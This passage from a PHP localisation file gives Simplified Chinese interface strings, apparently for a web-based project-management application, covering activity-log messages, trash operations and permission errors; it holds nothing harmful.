    'log unlink projectwebpages data' => '\'{0}\' 取消关联从  {1}',
    
    'log add contacts' => '\'{0}\' 已添加',
    'log edit contacts' => '\'{0}\' 已更新',
    'log delete contacts' => '\'{0}\' 已删除',
  	'log trash contacts' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash contacts' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment contacts' => '评论在 \'{0}\'上',
  	'log subscribe contacts' => '订阅到 \'{0}\'',
  	'log unsubscribe contacts' => '取消订阅到\'{0}\'',
    'log tag contacts' => '\'{0}\' 已标记',
    'log link contacts' => '\'{0}\' 已关联',
    'log unlink contacts' => '\'{0}\' 已取消关联',
    'log tag contacts data' => '\'{0}\' 标记为 \'{1}\'',
    'log link contacts data' => '\'{0}\' 关联到 {1}',
    'log unlink contacts data' => '\'{0}\' 取消关联从  {1}',
  
  	'no contacts in company' => '此公司没有联系人The company has no contacts.',
  
  	'session expired error' => '会话已经超期，请刷新此页并重新登录。',
  	'admin cannot be removed from admin group' => '第一个用户不能从超级管理员组被删除',
  	'open this link in a new window' => '在新窗口中打开此链接',
  
  	'confirm delete template' => '你是否确认想要删除此模板?',
  	'success delete template' => '模板 \'{0}\' 已被删除',
  	'success add template' => '模板 已添加',
  
  	'log add companies' => '\'{0}\' 已添加',
  	'log edit companies' => '\'{0}\' 已更新',
  	'log delete companies' => '\'{0}\' 已删除',
  	'log trash companies' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash companies' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment companies' => '评论在 \'{0}\'上',
  	'log subscribe companies' => '订阅到 \'{0}\'',
  	'log unsubscribe companies' => '取消订阅到\'{0}\'',
    'log tag companies' => '\'{0}\' 已标记',
    'log link companies' => '\'{0}\' 已关联',
    'log unlink companies' => '\'{0}\' 已取消关联',
    'log tag companies data' => '\'{0}\' 标记为 \'{1}\'',
    'log link companies data' => '\'{0}\' 关联到 {1}',
    'log unlink companies data' => '\'{0}\' 取消关联从  {1}',
  
  	'log add mailcontents' => '\'{0}\' 已添加',
  	'log edit mailcontents' => '\'{0}\' 已更新',
  	'log delete mailcontents' => '\'{0}\' 已删除',
  	'log trash mailcontents' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash mailcontents' => '\'{0}\' 已经从垃圾箱中恢复',
  	'log comment mailcontents' => '评论在 \'{0}\'上',
  	'log subscribe mailcontents' => '订阅到 \'{0}\'',
  	'log unsubscribe mailcontents' => '取消订阅到\'{0}\'',
    'log tag mailcontents' => '\'{0}\' 已标记',
    'log link mailcontents' => '\'{0}\' 已关联',
    'log unlink mailcontents' => '\'{0}\' 已取消关联',
    'log tag mailcontents data' => '\'{0}\' 标记为 \'{1}\'',
    'log link mailcontents data' => '\'{0}\' 关联到 {1}',
    'log unlink companies data' => '\'{0}\' 取消关联从  {1}',
  
  	'log open timeslots' => '\'{0}\' 已打开',
    'log close timeslots' => '\'{0}\' 已关闭',
    'log delete timeslots' => '\'{0}\' 已删除',
  	'log trash timeslots' => '\'{0}\' 已经移动到垃圾箱',
  	'log untrash timeslots' => '\'{0}\' 已经从垃圾箱中恢复',
  	'error assign workspace' => '指定模板到工作区失败',
  	'success assign workspaces' => '成功指定模板到工作区',
  	'success update config value' => '配置信息已更新',
  	'view open tasks' => '显示打开的任务',
  	'already logged in' => '你已经登录',
  
	'some tasks could not be updated due to permission restrictions' => '一些任务由于权限限制不能被更新',
  
  	'success trash object' => '对象已经成功移动到垃圾箱',
  	'error trash object' => '移动对象到垃圾箱失败',
	'success untrash object' => '对象已经成功从垃圾箱中恢复',
  	'error untrash object' => '从垃圾箱中恢复对象失败',
  	'success trash objects' => '{0} 个对象已经成功移动到垃圾箱',
  	'error trash objects' => '从垃圾箱中移动{0}个对象失败',
	'success untrash objects' => '{0} 个已经从垃圾箱中成功恢复',
  	'error untrash objects' => '从垃圾箱中恢复{0}个对象失败',
	'success delete object' => '对象被成功删除',
  	'error delete object' => '删除对象失败',
  	

  	'copied from file' => '从文件中拷贝{0} ({1})',

	'check file name advice' => '文件名改变后请按"TAB"键执行文件名检测，然后保存按钮才生效。',
	'filename already exists' => '文件名已经被其他文件所使用',

  	'success purging trash' => '{0}个对象已删除.',
  	'success sending reminders' => '{0}个提醒被发送.',
  	'failed to assign contact due to permissions' => '你没有写联系人的权限在工作区: {0}中',
  
  	'weblink dnx' => '请求的网站链接不存在。'
  ); // array

?>